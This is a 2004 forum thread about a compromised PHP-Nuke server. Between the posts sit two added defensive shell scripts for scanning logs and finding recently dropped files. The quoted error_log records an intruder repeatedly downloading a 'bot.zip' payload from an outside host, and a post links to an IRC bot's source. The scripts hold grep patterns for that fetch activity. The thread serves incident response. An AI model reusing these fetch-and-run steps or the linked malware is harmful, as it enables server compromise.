Dauthus
Worker
Joined: Oct 07, 2003
Posts: 211
Posted: Mon Aug 30, 2004 9:55 pm
From what I can tell, (and I ain't no expert) my dedicated server has been breached. I am going to list a portion of my error_log below. I only run nuke, and have the latest version of sentinel installed. I also only run phpnuke on my websites.
Can anyone venture to guess just how this a-hole got in? The "bot.zip" they are running is here:
http://packetstormsecurity.nl/irc/kaiten.c
error_log below:
Quote:
[Mon Aug 30 04:10:08 2004] [notice] Digest: generating secret for digest authentication ...
[Mon Aug 30 04:10:08 2004] [notice] Digest: done
[Mon Aug 30 04:10:08 2004] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Mon Aug 30 04:10:08 2004] [notice] LDAP: SSL support unavailable
[Mon Aug 30 04:10:09 2004] [notice] httpdmon: httpdmon_init
[Mon Aug 30 04:10:09 2004] [notice] bandwidth monitoring enabled (mapping file: /etc/virtualhosting/mappings/apache.domainmap)
[Mon Aug 30 04:10:10 2004] [notice] Apache/2.0.48 (Fedora) configured -- resuming normal operations
--07:42:57-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]
0K .......... .......... .......... .. 100% 281.53 KB/s
07:42:57 (281.53 KB/s) - `bot.zip' saved [33730/33730]
% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed
3 33730 3 1193 0 0 535 0 0:01:02 0:00:02 0:01:00 535
100 33730 100 33730 0 0 14365 0 0:00:02 0:00:02 0:00:00 262k
sh: line 1: lynx: command not found
--07:43:00-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]
0K .......... .......... .......... .. 100% 274.50 KB/s
07:43:00 (274.50 KB/s) - `bot.zip' saved [33730/33730]
% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed
3 33730 3 1193 0 0 10373 0 0:00:03 0:00:00 0:00:03 10373
29 33730 29 9881 0 0 53123 0 0:00:00 0:00:00 0:00:00 119k
100 33730 100 33730 0 0 141k 0 0:00:00 0:00:00 0:00:00 269k
sh: line 1: lynx: command not found
--07:43:01-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]
0K .......... .......... .......... .. 100% 276.80 KB/s
07:43:01 (276.80 KB/s) - `bot.zip' saved [33730/33730]
% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed
3 33730 3 1193 0 0 10464 0 0:00:03 0:00:00 0:00:03 10464
100 33730 100 33730 0 0 141k 0 0:00:00 0:00:00 0:00:00 267k
sh: line 1: lynx: command not found
--07:43:02-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]
0K .......... .......... .......... .. 100% 272.23 KB/s
07:43:02 (272.23 KB/s) - `bot.zip' saved [33730/33730]
% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed
3 33730 3 1193 0 0 10557 0 0:00:03 0:00:00 0:00:03 10557
100 33730 100 33730 0 0 140k 0 0:00:00 0:00:00 0:00:00 262k
sh: line 1: lynx: command not found
--07:43:02-- http://smartboy.100free.com/bot.zip
=> `bot.zip'
Resolving smartboy.100free.com... done.
Connecting to smartboy.100free.com[64.156.241.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,730 [application/zip]
0K .......... .......... .......... .. 100% 274.50 KB/s
07:43:02 (274.50 KB/s) - `bot.zip' saved [33730/33730]
% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed
3 33730 3 1193 0 0 10651 0 0:00:03 0:00:00 0:00:03 10651
100 33730 100 33730 0 0 141k 0 0:00:00 0:00:00 0:00:00 262k
sh: line 1: lynx: command not found
I am shutting down the server until it is fixed, but some thoughts on how they got in would be nice. It may not be through PHPNuke, but I just want to make sure.
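The error_log quoted above is the thread's main evidence: Apache never writes wget or curl progress output, or "sh: ... command not found", into its own log. Those lines appear there because a process spawned by the web server (a PHP script coerced into running shell commands) had its stdout/stderr attached to error_log. The shell snippet below is an added example, not code from this thread or from PHP-Nuke; it runs over a constructed log sample (the host example.invalid and the segfault notice are invented stand-ins) and pulls out the fetch-tool fingerprints a responder would look for, plus the URLs that were fetched so the hosts can be blocked at egress and the dropped files located on disk.

```shell
#!/bin/sh
# Constructed sample of an Apache error_log: a normal startup notice, then the
# kind of output a non-interactive download (wget/curl) leaves behind when a
# web application is coerced into running shell commands, then a normal notice.
SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
[Mon Aug 30 04:10:10 2004] [notice] Apache/2.0.48 (Fedora) configured -- resuming normal operations
--07:42:57-- http://example.invalid/bot.zip
=> `bot.zip'
Resolving example.invalid... done.
HTTP request sent, awaiting response... 200 OK
07:42:57 (281.53 KB/s) - `bot.zip' saved [33730/33730]
% Total % Received % Xferd Average Speed Time Curr.
sh: line 1: lynx: command not found
[Mon Aug 30 04:11:00 2004] [notice] child pid 1234 exit signal Segmentation fault (11)
EOF

# Print lines from an error_log that look like the output of a command-line
# fetch tool (wget banner, wget "saved" line, curl progress header) or a failed
# attempt to run one ("lynx: command not found"). Apache itself never emits
# these; their presence means a CGI/PHP child spawned a shell.
scan_error_log() {
    grep -E -e '^--[0-9]{2}:[0-9]{2}:[0-9]{2}-- +https?://' \
            -e 'saved \[[0-9]+/[0-9]+\]' \
            -e '^ *% +Total +% +Received' \
            -e '^sh: line [0-9]+: .*: command not found' \
            "$1"
}

# Number of suspicious lines; any non-zero value is the trigger to investigate.
count_suspicious() {
    scan_error_log "$1" | wc -l | tr -d ' '
}

# The URLs that were fetched, de-duplicated, one per line.
fetched_urls() {
    grep -E -o 'https?://[^ ]+' "$1" | sort -u
}

# Stand-alone run: report on the constructed sample.
if [ "$(count_suspicious "$SAMPLE_LOG")" -gt 0 ]; then
    echo "suspicious fetch activity in $SAMPLE_LOG:"
    scan_error_log "$SAMPLE_LOG"
    echo "URLs fetched:"
    fetched_urls "$SAMPLE_LOG"
fi
```

Point it at the real log with `scan_error_log /var/log/httpd/error_log`; the matching timestamps (07:42:57 and later in the quoted log) are what you then line up against access_log to find the request that triggered the download, which is the fastest way to answer Raven's "how did they get in" question.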
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Mon Aug 30, 2004 9:59 pm
What did they do? That usually helps isolate the exploit.
Do you have Coppermine or MyE_Gallery?
Was it phpnuke or cpgnuke or what?
Did they add authors?
Dauthus
Posted: Mon Aug 30, 2004 10:05 pm
As far as I can tell, they only caused my email on two accounts to stop functioning.
I have Coppermine (with all the latest security patches) installed.
Running Nuke 7.0 and 7.2 with the latest patches.
No authors were added that I can tell.
As far as tracking what exactly they did, I can't tell. Any folders on the server which were modified today are either temp folders which are empty, or are folders where the files have not been modified or created today. They left a hard trail to follow.
Raven
Posted: Mon Aug 30, 2004 10:09 pm
Email on your server or w/i nuke? If on your server then you're right; your server is breached. You will need to check your server logs, probably ftp, to see if that IP is in the ftp log.
Dauthus
Posted: Mon Aug 30, 2004 10:15 pm
Email was on the server. Not nuke. Checking the IP logs as I type. Raven, you ever hear of this hack before? Any ideas here?
Raven
Posted: Mon Aug 30, 2004 10:26 pm
No, but in order to do this they would probably have deposited 1 or more files on your server. Do you host this yourself or with someone? What front-end do you use if it's hosted? I would search the Internet for something like 'email hacked cpanel' or something depending on your front end. Can you search your server for files with today's date?
Dauthus
Posted: Mon Aug 30, 2004 10:32 pm
It is a hosted dedicated server. Does that make sense? I will have to look up the SSH parameters for finding files with today's date.
Ensim basic is the cp.
Thanks for the help. I will let you know if I come up with anything. I am going to have the host do a check and see what they find. If nothing else, it looks like a full software reinstall.
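Raven's suggestion to search the server for files with today's date, and Dauthus's plan to look up how to do that over SSH, is the filesystem side of the triage. The snippet below is an added example, not something either poster wrote; it builds a constructed scratch tree (two "legitimate" files back-dated to 2004 and one fresh archive) and shows `find` by modification time, by inode change time, and by name. It assumes a `find` that supports `-mmin`/`-cmin` (GNU and BSD both do) and a `touch` that accepts `-t`.

```shell
#!/bin/sh
# Triage helper: list files under a tree that changed in the last N minutes.
# A web-app compromise that downloads an archive leaves exactly this kind of
# trace: a fresh file in /tmp, a world-writable upload directory or the web root.

# Constructed fixture: two old files and one fresh drop.
FIXTURE="$(mktemp -d)"
mkdir -p "$FIXTURE/html" "$FIXTURE/tmp"
printf 'old page\n'   > "$FIXTURE/html/index.php"
printf 'old config\n' > "$FIXTURE/html/config.php"
printf 'PK\003\004'   > "$FIXTURE/tmp/bot.zip"    # fresh drop, zip magic bytes
# Push the legitimate files' mtime back to 2004 so only the drop is "recent".
touch -t 200408290400 "$FIXTURE/html/index.php" "$FIXTURE/html/config.php"

# Files under $1 whose contents were modified within the last $2 minutes.
# This is the "files with today's date" search; 1440 minutes is one day.
recently_modified() {
    find "$1" -type f -mmin "-$2" | sort
}

# Same search on ctime (inode change time). An intruder can forge mtime with
# touch, exactly as this fixture does, but ctime is set by the kernel on every
# metadata change and cannot be reset with touch, so the back-dated files
# still show up here.
recently_changed_inode() {
    find "$1" -type f -cmin "-$2" | sort
}

# Archives anywhere under $1 regardless of timestamp, for a second pass when
# timestamps look tampered with.
archives_under() {
    find "$1" -type f \( -name '*.zip' -o -name '*.tar' -o -name '*.tgz' -o -name '*.tar.gz' \) | sort
}

# Stand-alone run: what changed in the last day, by mtime and by ctime.
echo "modified (mtime) in the last 24h under $FIXTURE:"
recently_modified "$FIXTURE" 1440
echo "changed (ctime) in the last 24h under $FIXTURE:"
recently_changed_inode "$FIXTURE" 1440
```

On a real box you would run `recently_modified / 1440` and `recently_changed_inode / 1440` as root and compare the two lists: anything in the ctime list but not the mtime list has had its timestamp reset, which is itself worth a look. Run this before rebuilding, since a reinstall destroys the evidence that answers how they got in.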
Raven
Posted: Mon Aug 30, 2004 10:44 pm
Fedora (I just noticed). There are several alerts out right now on exploits with Fedora. This could be an exploit with Sendmail even. I did a google search on 'fedora exploits email' and here's one that came back as an example http://www.webhostingtalk.com/showthread.php?threadid=260623 - may not apply but there are many more.